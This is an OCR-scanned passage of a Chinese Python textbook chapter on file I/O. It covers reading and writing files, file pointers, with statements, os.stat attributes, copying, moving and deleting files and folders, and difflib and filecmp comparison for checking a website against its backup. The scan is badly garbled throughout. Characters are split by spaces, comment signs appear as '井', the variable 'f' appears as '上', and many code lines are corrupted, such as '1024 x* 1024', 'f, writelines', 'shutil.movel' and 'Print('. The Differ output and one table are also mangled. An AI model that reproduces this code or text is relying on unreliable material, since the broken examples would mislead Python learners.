一 次 性 读 取 文 件 的 所 有 内 容 。 

例 [4-1】 用 read() 方 法 读 取 。 

用 记事 本 在 Python 的 安装 目录 下 创建 test. txt 文件 ,文件 内 容 为 

Hello World 


Hello Python 


下 面 用 read() 方 法 无 size 参数 读 取 文 件 。 
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>>> 上 = open( 'test. txt', 'r') # 打开 文 件 

>>> content = f.read() 井 使 用 read() 读 取 文 件 , 未 指定 size 参数 , 则 读 取 全 部 内 容 
>>> print(content) 并 打印 读 取 的 内 容 

Hello World 

Hello Python 

>>> f.close() # 关 闭 文件 


使 用 read() 方 法 带 size 参数 读 取 文件 。 


>>> 上 = open( 'test. txt', 'r') 
>>> content = f.read(6) 
>>> print(content) 


Hello 


>>> f.close() 


例 [4-2】 使 用 readline() 方 法 读 取 文件 。 


>>> f= open( 'test. txt', 'r') 


>>> content = f.readline() # 读 取 文 件 中 的 一 行 

>>> print (content) # 打印, 可 以 看 出 读 取 了 文件 的 第 一 行 

Hello World 

>>> content2 = f.readline() # 读 取 文 件 中 的 一 行 

>>> print(content2) 井 打印 ,可 以 看 出 读 取 了 文件 的 第 二 行 

Hello Python 

>>> content3 = f. readline() # 读 取 文 件 中 的 一 行 

>>> print(content3) 井 打印 ,因为 已 经 到 达 文件 尾 , 读 取 的 内 容 为 空 


>>> f.close() 


例 [4-3】 使 用 readlines() 方 法 读 取 文 件 。 


>>> f = open( 'test. txt', 'r') 
>>> content = f.readlines() # 读 取 文件 的 所 有 内 容 
>>> print(content) # 打印, 读 取 的 内 容 是 由 每 一 行 组 成 的 列表 


['Hello World\n'，'Hello Python'] 


>>> f.close() 


4.1.4 写 人 数据 
将 数据 写 入 文件 ,主要 有 以 下 方法 。 


1. f.write(str) 


将 字符 串 写 入 文件 ,没有 返回 值 。 


2. f. writelines( sequence) 

向 文件 写 入 一 个 序列 字符 串 列表 ,如 果 需 要 换行 则 要 自己 加 入 每 行 的 换行 符 。 

例 [4-4】 

>>> 上 = open( 'test. txt', 'w') 

>>> f.write( 'I am learning Python') 并 将 字符 串 写 入 文件 ,此 时 新 写 和 的 数据 会 覆盖 原 有 数据 
20 


>>> f.close() 
例 [4-5】 


>>> strings = ' "ine 1 
line 2 
line3 
line4 
# 定 义 一 个 多 行 字符 串 
>>> = open( 'test. txt', 'w') 
>>> f, writelines(strings) # 将 字符 序列 写 入 文件 
>>> f.close() 


4.1.5 以 添加 方式 写 人 数据 


打开 文件 时 ,指定 打开 方式 为 aa 十 ,这 时 往 文件 中 写 入 数据 时 ,就 是 以 添加 方式 写 
六 了 = 
例 [4-6】 


>>> f = open( 'test. txt', 'a') 
>>> f.write( 'this is appended line') 


>>> f.close() 


这 时 文件 内 容 就 变 成 了 : 
line 1 
line 2 
line3 
lined 


this is appended line 


4.2 文件 指针 


文件 指针 是 指 在 进行 文件 读 / 写 操作 时 ,指示 读 / 写 位 置 的 指针 。 与 指针 有 关 的 方法 有 
以 下 几 种 。 


1. f.tell() 
返回 文件 指针 的 当前 位 置 。 


2. f.seek(CoffsetL， whence=0]) 
从 whence(0 代表 文件 开始 ; 1 代表 文件 当前 位 置 ; 2 代表 文件 末尾 ) 偏 移 offset 字 节 ， 


例 [4-7】 通过 f. tellO 〇 函数 获取 文件 指针 的 位 置 。 


>>> f = open( 'test. txt') 
>>> print(f. tell()) 


>>> print(f. readline()) 


>>> print(f. tell()) 


>>> print(f. readline()) 


>>> print(f. tell()) 


>>> f.close() 


例 [4-8】 用 f. seek() 函 数 移动 文件 指针 的 位 置 。 


>>> = open('test. txt', 'r+') 
>>> print(f. tell()) 


>>> print(f. readline( )) 


>>> f.tell() 


>>> f.write('I love Python') 


>>> f. seek(0,0) 


>>> print(f.readline()) 
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>>> f. seek(0,2) 


64 


>>> f.write("I love my motherland" ) 


20 


>>> print(f.tell()) 


84 


>>> f.close() 
>>> 


4.3 基于 上 下 文 管理 的 文件 操作 


从 上 文中 可 以 看 出 ,对 文件 的 操作 需要 三 步 : 打开 文件 .操作 文件 ,关闭 文件 ,在 这 个 过 
程 中 ,还 有 可 能 会 出 现 异常 ,为 了 更 加 高 效 安全 地 操作 文件 ,Python 从 2. 5 版 本 开始 引入 了 
基于 上 下 文 管理 的 with 语句 ,with 语句 的 目的 在 于 从 程序 中 把 try、except 和 finally 关键 
字 与 资源 分 配 释放 相关 代码 都 删除 ,不 再 使 用 try...except...finally... 这 样 复杂 的 语句 结构 。 
with 语句 的 基本 用 法 为 

with 上 下 文 表达 式 [as 变量 ] : 

with 语句 体 

with 语句 看 起 来 如 此 简单 ,其 实 它 是 基于 上 下 文 管理 协议 的 ,基于 上 下 文 管理 协议 的 
对 象 都 已 经 实现 了 _enter () 和 _ exit_() 方 法 ,上 下 文 管理 器 执行 with 语句 时 要 建立 运 
行 时 上 下 文 ,会 调用 这 两 种 方法 执行 进入 和 退出 操作 ,_enter _0 〇 方法 在 with 语句 体 执 行 
之 前 进入 运行 时 上 下 文 ， exit_() 在 with 语句 体 执 行 完 后 从 运行 时 上 下 文 退出 。Python 
中 支持 上 下 文 管理 的 对 象 都 已 实现 了 这 两 种 方法 ,在 这 两 种 方法 中 实现 了 环境 的 初始 化 和 
清理 工作 。 对 于 文件 的 操作 用 以 下 的 方法 实现 : 

例 [ch4_3withl1. py】 

1. 井 coding:utf 一 8 

2. with open("test.txt","r") as ff: 

3, for line in f: 

4 print(line,end= "") 


说明: 可 以 看 出 ,在 这 个 对 文件 进行 操作 的 语句 中 ,已 经 没有 关闭 文件 的 语句 了 ， 
这 样 不 用 总 是 想 着 关闭 文件 了 。 这 是 因为 当 with 代码 块 执行 完毕 时 ,内 部 的 _exit _() 方 
法 会 自动 关闭 并 释放 文件 资源 。 从 Python 2.7 后 ,with 语句 开始 支持 同时 对 多 个 文件 的 上 
下 文 管理 。 下 例 中 将 test. txt 文件 内 容 读 出 并 写 入 test2. txt 文件 中 。 

例 [ch4_3with2. py】 


1. #coding:utf—8 
2. with open("test. txt", 'r') as fr, open("test2. txt", 'w') as fw: 


3. for line in fr: 


4. fw. write(line) 


4.4 文件 属性 


每 个 文件 都 有 许多 属性 ,这 些 属性 中 与 人 们 工作 、 学 习 、 生 活 关系 比较 密切 的 有 文件 大 
小 .创建 时 间 修改 时 间 、 访 问 日 期 \ 只 读 、 隐 藏 等 属性 ,在 os 模块 的 stat() 函 数 就 可 以 读 取 
以 上 属性 。 如 : 

例 [4-9】 打印 文件 属性 。 

>>> import os 


>>> filestat = os. stat( 'test. txt') 
>>> print(filestat) 


os. stat_result(st_mode = 33206, st_ino= 12103423998726842，st_dev = 1656787941，st_nlink = 
1，st_uid=0，st_gid= 0，st_size=46，st_atime = 1476927323, st_mtime= 1477230716, st_ctime 
= 1476927323) 

os. stat() 函 数 返回 的 属性 元 组 的 含义 ,如 表 4-2 所 示 。 


表 4-2 os. stat() 函 数 返回 的 属性 元 组 的 含义 



































属 性 会 - “区 
st_mode 文件 类 型 与 文件 模式 

st_ino Inode 号 码 , 记 录 文件 的 存储 位 置 
st_dev 存储 文件 的 设备 号 

st_nlink 文件 的 硬 连接 数量 

st_uid 文件 所 有 者 的 用 户 IDCuser id) 
st_gid 文件 所 有 者 的 用 户 组 ID(user group id) 
St_size 文件 大 小 ,单位 为 字 节 

st_atime 文件 访问 日 期 

st_mtime 文件 修改 时 间 

st_ctime 文件 创建 时 间 


从 上 面 的 打印 结果 来 看 ,文件 的 创建 时 间 怎 么 会 是 1476927323 这 样 一 个 大 浮 点 数 
呢 ? 原来 这 个 数字 是 从 1970-01-01 08:00:00 开始 的 “ 秒 数 ”, 也 就 是 说 ,这 个 时 间 就 是 从 
1970-01-01 08:00:00 开始 ,过 了 1476 927 323s 之 后 的 时 间 。 要 把 它 变 成 人 们 习惯 的 时 间 
表示 ,需要 用 到 time 模块 中 的 localtime() 函 数 。 见 下 例 。 
例 [ch4_4attr. py】 
井 coding:utf 一 8 
import os 


冯 
3. import time 
4 
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5. def getctime(filename): 

6. filestat = os. stat (filename) 

b cyear = time. localtime(filestat. st_ctime). tm year 

8. cmonth = time. localtime(filestat. st_ctime). tm mon 

i cday = time. localtime(filestat. st _ctime). tm mday 

10. chour = time. localtime(filestat. st_ctime) .tm_ hour 

和 cminits = time. localtime(filestat. st_ctime). tm min 

2 csec = time. localtime(filestat. st_ctime) .tm_sec 

3 print('% s 文件 创建 时 间 为 : %d- %d- %d %d:%d:%d's% (filename, cyear, cmonth, 
cday, chour, cminits, csec)) 

14. 

15. def getmtime(filename): 

16. filestat = os. stat(filename) 

17. myear = time. localtime(filestat. st_mtime). tm year 

18. mmonth = time. localtime(filestat. st_mtime). tm mon 

19. mday = time. localtime(filestat. st_mtime). tm mday 

20. mhour = time. localtime(filestat. st_mtime). tm hour 

mminits = time. localtime(filestat. st_mtime). tm min 

-+ msec = time. localtime(filestat. st_mtime). tm sec 

和 print('% s 文件 修改 时 间 为 : %d- %d- %d %d:%d:%d'% (filename, myear, mmonth, 
mday, mhour, mminits, msec)) 

24. 

25. def getatime(filename) : 

26. filestat = os. stat(filename) 

275 ayear = time. localtime(filestat. st_atime).tm_year 

28. amonth = time. localtime(filestat. st_atime) .tm_mon 

29. aday = time. localtime(filestat. st_atime) .tm mday 

30. ahour = time. localtime(filestat. st_atime). tm hour 

3 aminits = time. localtime(filestat. st_atime). tm min 

3 asec = time. localtime(filestat. st_atime). tm sec 

33. print('% s 文件 访问 时 间 为 : %d- %d- %d %d:%d:%d'% (filename, ayear, amonth, 
aday, ahour, aminits, asec)) 

34. 

35. def getfsize(filename) : 

36. filestat = os. stat(filename) 

3 fsize= filestat. st_size 

38. if fsize< 1024: 

39. print(" 名 s 文件 大 小 为 : % dByte" % (filename, fsize)) 

40. elif 1024< fsize< 1024 x* 1024: 

41. print(" 名 s 文件 大 小 为 : % dKB" % (filename, fsize/1024)) 

42. elif 1024 * x 2<fsize<1024* 关 3: 

43. print("%s 文件 大 小 为 : dMB" % (filename, fsize/(1024 * *2))) 
44. elif 1024 * x* 3<fsize: 

45. print(" 名 s 文件 大 小 为 : %dGB" % (filename, fsize/(1024* *3))) 
46. 

47. filename = input( ' 请 输入 文件 名 :') 

48. getctime(filename) 

49. getmtime(filename) 
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50. getatime(filename) 


51. getfsize(filename) 


4.5 文件 的 操作 


4.5.1 复制 文件 

shutil 模块 中 的 copy() 函数 用 于 实现 复制 文件 ,函数 用 法 为 
copy(src, dst) 

copy() 函数 把 文件 从 src 复制 到 dst。 如 : 


>>> import shutil 
>>> shutil. copy( 'test. txt', 'test. bak') 


'test. bak' 


copy(src,dst) 也 可 以 把 文件 复制 到 不 同 的 文件 夹 。 
>>> shutil. copy( 'C:\\Python35\\NEWS. txt', 'C:\\NEWS. bak') 


'C:\\NEWS. bak’ 


4.5.2 有 删除 文件 
删除 文件 需要 用 到 os 模块 的 remove() 函数 ,为 了 确保 删除 的 正确 执行 ,可 以 先 用 
os. path. exists() 函数 判 断 文 件 是 否 存在 。 


>>> import os. path 

>>> import os, os. path 

>>> file= 'test. bak’ 

>>> if os. path. exists(file): 
os. remove(file) 


4.5.3 文件 重 命名 
可 以 使 用 os. rename() 函数 对 文件 或 文件 夹 进行 重 命名 。 


>>> if os. path. exists( 'test. txt'): 
os.rename( 'test. txt', 'test2. txt') 


4.5.4 移动 文件 
使 用 shutil. movelsrc,dst) 函 数 可 以 实现 文件 的 移动 。 


>>> shutil. movel( 'test2. txt', 'test. txt') 


‘test. ExtE" 
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井 把 test2.txt 改名 为 test. txt, 此 时 的 move( ) 相 当 于 os. rename( src, dst) 
>>> shutil. move( 'test2. txt', 'C:\\test. txt') 


'C:\\test. txt' 


井 把 test2. txt 移动 到 了 不 同 的 文件 夹 


4.6 文件 夹 的 操作 


4.6.1 文件 夹 的 创建 


使 用 os. mkdir() 函数 可 以 创建 一 个 指定 的 文件 夹 ,os. listdir() 函 数 获 取 指 定 目 录 中 的 
内 容 。 代 码 如 下 : 


>>> os. mkdir( 'C:\\mytemp') 
>>> os. listdir( 'C:\\') 


['Boot', 'bootmgr', 'config. ini', 'css.html', 'DkHyperbootSync', ‘Documents and Settings', 'Drcom 
', 'engine. ini', 'GrandeDevice', 'hiberfil.sys', 'javascript. html', 'jlcss', 'log.txt', 'login. 
html', 'mfg', 'MSOCache', 'mytemp', 'pagefile. sys', 'Program Files', 'Program Files (x86)', ' 
ProgramData', 'Python34', 'Python35', 'RRbackups', 'sparkraw. 10g', 'support', 'SWSHARE', 'SWTOOLS 
', 'System Volume Information', 'Temp', 'Users', 'Windows'] 


创建 多 级 文件 夹 : 


>>> os. mkdir('. /mydir/subdir') 
Traceback (most recent call last): 
File "<pyshell#27>", line 1, in<module> 


os. mkdir('. /mydir/subdir') 
FileNotFoundError: [WinError 3] 系统 找 不 到 指定 的 路 径 。: '. /mydir/subdir' 
可 见 使 用 os. mkdir('') 函 数 不 能 创建 多 级 文件 夹 。 


>>> os. makedirs('. /mydir/subdir') 
>>> os. listdir('.') 


['blogapp', 'ch4_10.py', 'DLLs', 'Doc', 'include', 'Lib', 'libs', 'LICENSE. txt', ‘microblog', 'mydir 
', ‘NEWS. txt', 'python. exe', 'python3.d1l', 'python35.d11', 'python35 d.dll', ‘python35 d.pdb', 


'python3_d.dll', ‘pythonw. exe', 'pythonw_d. exe', 'pythonw_d.pdb', 'python _d.exe', 'python d.pdb 
', 'README. txt', 'Scripts', 'tcl', 'test.txt', 'Tools', 'vcruntime140.d11'] 


4.6.2 删除 文件 夹 
使 用 os. rmdir() 函数 删 除 一 个 文件 夹 。 


>>> os. rmdir( 'C:\\mytemp') 
使 用 os. removedirs() 函 数 删除 多 级 目录 。 


>>> os. removedirs('. /mydir/subdir') 
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4.7 内 容 比 对 


4.7.1 Difflib 模块 实现 字符 串 比较 


在 日 常安 全 运 维 工作 中 ,保证 系统 的 安全 ,防止 系统 被 自 改 ,保证 系统 的 完整 性 是 运 维 
中 一 项 重要 的 工作 。 要 保证 系统 的 完整 性 ,目前 比较 常用 的 做 法 是 : 先 对 应 用 系统 进行 备 
份 , 然 后 定期 地 对 应 用 系统 中 的 文件 与 备份 的 文件 进行 比较 , 若 出 现 不 一 致 的 情况 ,可 以 认 
为 系统 已 经 被 黑客 自 改 ,应 该 采取 紧急 应 对 措施 。Python 中 已 经 内 置 了 Difflib 模块 , 它 提 
供 了 用 于 序列 比较 的 类 和 函数 , 它 可 以 比较 字符 串 、 文 件 、 文 件 系统 等 ,并 以 HTML 等 格式 
报告 区 别 信 息 。 此 功能 还 可 参见 Filecmp 模块 。 

Difflib 模块 包括 difflib. SequenceMatcher、 difflib. Differ ,difflib. HtmlDiff 三 个 类 及 一 
些 函 数 。 

(1) difflib. SequenceMatcher 类 是 一 个 进行 任何 类 型 序列 比较 的 类 ,该 类 使 用 了 20 世 
纪 80 年 代 晚 期 由 Ratcliff 和 Obershelp 发 布 的 模式 匹配 算法 ,该 算法 主要 是 用 于 查找 最 长 
连续 子 序列 ,也 被 回归 地 用 于 左右 双向 子 序列 匹配 。 

(2) difflib. Differ 类 用 于 多 行文 本 序列 的 比较 ,并 产生 人 们 能 够 识别 的 区 别 或 变量 ， 
Differ 使 用 SequenceMatcher 比较 行 序列 与 相应 行 中 的 字符 序列 。 

每 行 区 别 前 的 符号 有 着 特别 的 含义 ,其 含义 如 表 4-3 所 示 。 


表 4-3 Differ 类 区 别 首 字符 含义 表 

















符号 含义 
区 别 内 容 包含 在 序列 1 中 ,但 不 包含 在 序列 2 中 
由 到 区 别 内 容 包 含 在 序列 2 中 ,但 不 包含 在 序列 1 中 
两 序列 中 共有 
攻 各 输入 序列 中 均 不 存在 


(3) difflib. HtmlDiff 类 能 够 产生 一 个 HTML 表 ( 或 者 包含 表格 的 HTML 文件 ) , 逐 行 
地 以 高 亮 的 方式 显示 文本 内 容 的 区 别 。 该 区 别 可 能 是 全 文 或 上 下 文 上 的 区 别 。 该 类 包含 以 
下 方法 : 


make file(fromlines, tolines, fromdesc= '', todesc = '', context = False,numlines = 5) 


用 来 生成 一 个 包含 表格 的 html 文件 ,其 内 容 是 用 来 展示 差异 。 

fromdesc 和 todesc 是 可 选 参数 ,指定 范围 的 列 标题 字符 串 ,默认 为 空 ; context 为 可 选 
参数 ,默认 为 True, 设 置 为 True 时 显示 不 同 的 文本 ,设置 为 Falsh 时 显示 全 文 文本 ; 
numlines 为 可 选 参数 ,控制 高 亮 显示 的 区 别 的 显示 行 数 ,通过 next 超级 链接 指向 其 余 
的 区 。 





make_table(fromlines，tolines，fromdesc = '"，todesc = "'，context = False，numlines =5) 


该 方法 和 make_file 用 法 一 样 ,唯一 的 区 别 在 于 它 只 生成 了 一 个 html 表格 字符 串 。 
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(4) difflib. context_diff(a, b[, fromfile="', tofile=""][, fromfiledate= '', tofiledate= "'] 
[, n=3]L, lineterm= "\n'])。 

比较 a 与 b (字符 串 列 表 ) ;返回 内 容 上 的 区 别 。 

(5) difflib. get_close_matches(word，possibilities，n 王 3，cutoff 一 0.6) 。 

返回 一 个 最 相似 匹配 的 列表 word, 用 来 进行 匹配 的 片段 (典型 的 应 用 是 字符 串 ) 。 

possibilities ,用 来 匹配 word 的 片段 。 

n, 默 认为 3, 返 回 的 最 多 结果 数 ,必须 大 于 0。 

cutoff ,默认 为 0. 6 ,匹配 的 相似 因数 , 它 是 一 个 介 于 0 一 1 的 浮 点 数 。 

(6) difflib. ndiff(a, b[, linejunk= None][, charjunk=1IS_ CHARACTER_JUNK |])。 

比较 a 和 b, 返 回 差 异 。 


1. SequenceMatcher 实例 


>>> import difflib 

>>> from pprint import pprint 

>>>a = "www.baidu. com is wonderful' 

>>>b = 'Www.Baidu. com also wonderful' 

>>> s = difflib. SequenceMatcher(None, a, b) 
>>> print("s. get_matching blocks():") 


s, get_matching blocks() : 


>>> pprint(s.get_matching blocks()) 


[Match(a=1, b=1, size=3), 
Match(a= 5, b=5, size= 9), 
Match(a= 15, b= 16, size=1), 
Match(a= 16, b= 18, size= 10), 
Match(a= 26, b= 28, size= 0)] 


>>> print("s. get_opcodes():") 
s.get_opcodes(): 


>>> for tag, il, i2, jl1, j2 in s.get_ opcodes(): 
print("%7sal%d:%d] (%s) b[%d:%d] (%s)" % (tag, il, i2, a[il:i2], j1, j2, b[j1: 
j2])) 


replace a[0:1] (w) b[0:1] (W) 
equal a[1:4] (ww.) b[1:4] (ww.) 
replace a[4:5] (b) b[4:5] (B) 
equal a[5:14] (aidu. com ) b[5:14] (aidu. com ) 
replace a[14:15] (i) b[14:16] (al) 
equal a[15:16] (s) b[16:17] (s) 
insert a[16:16] () b[17:18] (o) 
equal a[16:26] ( wonderful) b[18:28] ( wonderful) 
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2. Differ 实例 
代码 [ch4_7_1differ. py】 


import difflib 

diff = difflib.Differ().compare("I love Python", "I Love python") 
Print(" 横 向 显示 : "，) 

print(…. join(list(diff))) 

diff = difflib.Differ().compare("I love Python","I Love python") 
print(" 纵 向 显示 :") 

print('\n'. join(list(diff))) 


程序 运行 结果 : 


aouwi wb 


横向 显示 : 
Ee ne 
纵向 显示 : 
1 

ct 
> 

o 

v 

e 

= 
中 

了 

t 

h 

o 

n 


前 面 是 ' ' 的 字符 为 两 个 字符 串 中 均 出 现 的 字符 ; 前 面 是 ' 一 ' 的 字符 表示 字符 串 一 中 
有 ,而 字符 串 二 中 没有 的 字符 ; 前 面 是 ' 十 ' 的 字符 表示 字符 串 一 中 没有 ,而 字符 串 二 中 有 的 
3. HtmlDiff 实例 





>>> import difflib 

>>>s = difflib.HtmlDiff().make file('I love Python', 'I Love python') 

>>> 上 = open(r"C:\\diff. html", "w") 井 此 处 为 Windows 平台 ,Linux 平台 作 相 应 修改 
>>> f.write(s) 


4908 


>>> f.flush() 
>>> f.close() 


打开 diff. html, 内 容 如 图 4-1 所 示 。 
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图 4-1 difflib. HtmlDiffO 〇 . make_file 比 对 结果 报表 


4.7.2 Filecmp 模块 实现 文件 比较 


Python 标准 库 中 包含 了 Filecmp 模块 , 它 可 以 实现 文件 .目录 ( 含 子 目 录 ) 的 差异 比较 ， 
它 是 一 个 轻 量 级 的 工具 ,使 用 起 来 非常 方便 。 它 提供 了 三 种 方法 : cmp( 比 较 单 个 文件 )、 
cmpfiles( 比 较 多 个 文件 ) .dircmp( 目 录 的 对 比 )。 下 面 分 别 予 以 介绍 。 

1. filecmp.cmp(f1, f2[， shallow]) 方 法 

该 方法 的 功能 是 比较 两 个 文件 是 否 匹 配 。 参 数 {1 、f2 指定 要 比较 的 文件 的 路 径 。 可 选 
参数 shallow 指定 比较 文件 时 是 否 需要 考虑 文件 本 身 的 属性 (通过 os. stat() 函 数 可 以 获得 
文件 属性 ,如 最 后 访问 时 间 、 修 改 时 间 、 状 态 改变 时 间 等 ),shallow 默认 值 为 True, 此 时 只 根 
据 os. stat() 函数 返回 的 值 进行 比较 , 当 shallow 值 为 False 时 ,os. stat() 函 数 返回 值 与 文件 
内 容 同 时 进行 比较 。 如 果 文 件 内 容 匹 配 ,函数 返回 True; 否则 返回 False。 

例 [ch4 7_2filecmp. py】 


import os 
import filecmp 


1 
2 
3 
4. fl = open(r"C:\\test\\filel.txt","w") 
5. f1.write("Abcdefghijklmnopqrstuvwxy2Z") 
6. fl.flush() 

7 

8 


. f2 = open(r"C:\\test\\file2. txt","w") 
9. f2.write("abcdefghijklmnopgrstuvwxyz") 
10. f2.flush() 

11. fl.close 
12. f2.close 
13， 间 两 个 文件 同时 关闭 ,使 它们 的 属性 一 致 
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14. print(os. stat("C:\\test\\filel. txt")) 

15. print(os.stat("C:\\test\\file2. txt")) 

16. filecmp.clear cache() 

17. 井 清 理 filecmp( ) 缓 存 ,此 操作 在 比较 非常 快 的 情况 下 会 非常 有 用 

18. fcl = filecmp.cmp("C:\\test\\filel.txt","C:\\test\\file2. txt", True) 

19. print(" 在 shallow 默认 值 为 True 情况 下 ,只 比较 文件 属性 ,返回 值 为 : ", fc1) 

20. filecmp.clear cache() 

21. fc2 = filecmp.cmp("C:\\test\\filel.txt","C:\\test\\file2. txt", False) 

22. print(" 在 shallow 默认 值 为 False 情况 下 ,文件 属性 与 内 容 同时 比较 ,返回 值 为 : ", fc2) 


程序 运行 结果 : 


os. stat_result(st_mode = 33206, st_ino= 25051272927323122，st_dev = 460233，st_nlink=1，st_ 
uid=0, st_gid= 0，st_size = 26，st_atime = 1434616745，st_mtime = 1434616745, st_ctime= 
1434615066) 

os. stat_result(st_mode = 33206, st_ino= 24488322973901839, st_dev= 460233，st_nlink=1，st_ 
uid=0，st_gid = 0，st_size = 26，st_atime = 1434616745, st_mtime = 1434616745, st_ctime= 
1434615066) 

在 shallow 默认 值 为 True 情况 下 ,只 比较 文件 属性 ,返回 值 为 : True 

在 shallow 默认 值 为 False 情况 下 ,文件 属性 与 内 容 同 时 比较 ,返回 值 为 : False 


从 代码 的 执行 结果 可 以 看 出 , 除 st_ino(Inode 号 ) 不 同 外 ,其 他 一 些 属性 st_atime( 访 问 
时 间 ) 、st_mtime( 修 改 时 间 )、st_ctime( 创 建 时 间 ) 都 是 相同 的 ,可 见 ,shallow 值 为 True 时 ， 
只 比较 os. stat() 函 数 返 回 值 ,因此 ,filecemp. cmp() 函数 返 回 True; shallow 值 为 False 时 ， 
比较 os. stat() 函数 返回 值 及 文件 内 容 ,该 例 中 filecmp. cmp0 〇 函数 返回 False。 


2. filecemp. cmpfiles(dir1, dir2,， common[ ,shallow]) 比 较 多 个 文件 


该 方法 比较 dirl ,dir2 目录 下 多 个 文件 ,参数 common 指定 要 比较 的 文件 名 列表 。 函 数 
返回 包含 3 个 list 元 素 的 元 组 ,分 别 表 示 匹 配 、 不 匹配 以 及 错误 的 文件 列表 。 错 误 的 文件 指 
的 是 不 存在 的 文件 ,或 文件 被 锁定 不 可 读 ,或 没 权 限 读 文 件 ,或 者 由 于 其 他 原因 访问 不 了 该 
人 

在 D:\pythonproj\test 目录 下 有 dirl 和 dir2 两 个 目录 ,在 dirl 目录 下 有 filel. txt、 
file2. txt、file3. txt file4. txt; 在 dir2 目录 下 有 filel. txt file2. txt ,file3. txt,file5. txt, 它们 
的 SHA-1 值 如 下 所 示 : 


dirl : 

FE2DD62DDB37024E1AFCD956BB7EE5F99004FC489 filel. txt 
32D10C7B8CF96570CAO04CE37F2A19D84240D3A89 file2. txt 
5859FB9105C0D530FE3D49B9BC65C9911CFFDF9B file3. txt 
01B307ACBA4F54F55AAFC33BBO6BBBF6CA803E9A filed. txt 
dir2: 

F2DD62DDB37024E1AFCD956BB7EE5F99004FC489 filel. txt 
32D10C7B8CF96570CAO4CE37F2A19D84240D3A89 file2. txt 
340ED1BA0D46474A77DFAC96B8F309BCD8CE7TA47 file3.txt 
BD5ES5EBO49F3907175F54F5A571BA6B9FDEA36AB file5. txt 
>>> filecmp. cmpfiles("D:\\pythonproj\\test\\dir1", "D:\\pythonproj\\test\\dir2", [ 'filel. txt', 
'file2. txt', 'file3. txt', 'filed. txt', 'file5. txt']) 
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(['filel. txt', 'file2.txt'], ['file3.txt'], ['file4.txt', 'file5.txt']) 


从 分 析 结 果 可 以 看 出 ,两 目录 下 的 filel. txt \file2. txt 完全 相同 ,因此 匹配 ; file3. txt 不 
相同 ,因此 不 匹配 ; file4. txt 在 dir2 目录 下 不 存在 ,file5. txt 在 dir2 目录 下 不 存在 ,因此 
错误 。 

3. dircemp(a,b[ ,ignore[ ,hide]]) 文 件 夹 比较 

diremp(a,b[ ,ignore[ ,hide]]) 用 于 比较 文件 夹 , 通 过 该 类 比较 两 个 文件 夹 ,可 以 获取 一 
些 详 细 的 比较 结果 (如 只 在 A 文件 夹 存在 的 文件 列表 ) ,并 支持 子 文件 夹 的 递归 比较 。 

dircmp() 方 法 提供 了 以 下 三 个 输出 报告 的 方法 。 

9 report() ,比较 文件 夹 a 和 b, 并 输出 报告 到 标准 输出 设备 。 

9 _ report_partial_closure() ,比较 ab 目录 及 其 下 的 第 一 级 目录 并 输出 。 

9 report_full_closure() ,递归 比较 指定 目录 ab 下 的 所 有 共有 子 目 录 并 输出 。 

为 了 获取 详细 的 比较 结果 ,dircmp() 方 法 提供 了 以 下 一 些 属 性 。 

9 left_list: 左边 文件 夹 中 的 文件 与 文件 夹 列表 ; 
right_list: 右边 文件 夹 中 的 文件 与 文件 夹 列表 ; 
common: 两 边 文件 夹 中 都 存在 的 文件 或 文件 夹 ; 
left_only: 只 在 左边 文件 夹 中 存在 的 文件 或 文件 夹 ; 
right_only: 只 在 右边 文件 夹 中 存在 的 文件 或 文件 夹 ; 
common_dirs: 两 边 文件 夹 都 存在 的 子 文件 夹 ; 
common_files: 两 边 文件 夹 都 存在 的 子 文件 ; 
common_funny: 两 边 文件 夹 都 存在 的 文件 夹 ; 
same_files: 匹配 的 文件 ; 
diff_files: 不 匹配 的 文件 ; 
funny_files: 两 边 文件 夹 中 都 存在 ,但 无 法 比较 的 文件 ; 
subdirs: 将 common_dirs 目录 名 映射 到 新 的 dircmp 对 象 , 格 式 为 字典 类 型 。 

下 面 比较 服务 器 中 的 C:\inetpub\wwwroot 目录 与 E:\webbackup 目录 ,并 输出 相关 
属性 的 值 。 

例 [ch4 7_2diff_files. py】 


Ooeoeoocoocoocooo 2 


0 


from filecmp import * 


1 

2 

3. def print diff files(dcmp): 

4 print(dcmp. diff files) 

5 for name in dcmp. diff files: 

6 print("diff file %s found in %sand %s" % (name, dcmp. left, dcmp.right)) 
7 for sub_dcmp in dcmp. subdirs. values(): 

8 print diff files(sub dcmp) 

Ed 


10. def main(): 
i dira = 'C:\\inetpub\\wwwroot\\' 
i dirb = 'E:\\webbackup\\" 
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Ee dcmp = dircmp(dira, dirb) 
14. print diff files(dcmp) 


16. if_name == ' main ': 
17. main() 


通过 代码 可 以 比较 网 站 与 备份 的 内 容 是 否 一 致 , 若 不 一 致 , 则 可 以 判断 网 站 内 容 被 算 
比如 代码 的 提示 信息 为 


[ "index. asp'] 
diff file index.asp found in C:\inetpub\wwwroot\ and e:\webbackup\ 


则 可 以 判断 网 站 的 主页 已 经 被 自 改 ,需要 管理 员 马 上 采取 行动 ,保障 网 站 的 安全 。 
习 题 


编程 题 

1. 把 字符 串 “abcdef123456 中 国 " 存 入 C:\test. txt 文件 ,查看 文件 的 长 度 ( 字 节 数 ) 。 

2. 打开 第 1 题 生成 的 C:\test. txt 文件 ,在 文件 头 部 插入 “这 是 插入 的 内 容 ”, 然 后 在 文 
件 尾部 添加 “这 是 添加 的 内 容 ”。 

3. 把 第 2 题 生成 的 C:\test. txt 文件 复制 到 D:Ntestbak. txt。 

4. 打印 第 2 题 生 成 的 C:\test. txt 文件 的 属性 。 


面向 对 象 编程 (Object Oriented Programming,OOP) 是 Python 中 重要 的 编程 思想 , 面 
向 对 象 的 编程 思想 解决 了 程序 代码 的 复 用 问题 。 过 去 使 用 较 多 的 是 面向 过 程 的 程序 设计 方 
法 ,该 方法 把 程序 视 为 一 系列 命令 的 集合 ,把 程序 分 为 一 个 个 的 子 函 数 ,函数 完成 一 定 的 功 
能 。 面 向 对 象 编程 则 是 把 事物 抽象 为 类 ,类 中 包含 成 员 属性 和 成 员 方法 ,成 员 属性 又 称 为 成 
员 变 量 , 成 员 方法 称 为 成 员 函 数 或 成 员 方 法 。 类 把 成 员 变 量 和 成 员 方 法 进行 封装 ,通过 类 
的 成 员 方法 操作 成 员 变 量 ; 在 已 有 类 的 基础 上 ,可 以 生成 新 的 类 , 称 为 继承 ,已 有 的 类 称 
为 父 类 ,新 继承 生成 的 类 称 为 子 类 , 子 类 继承 了 父 类 的 所 有 属性 和 方法 ,并 且 可 以 创造 出 
属于 自己 的 新 的 属性 和 方法 。 子 类 的 方法 在 处 理 数 据 时 ,可 以 根据 数据 对 象 的 类 型 选择 
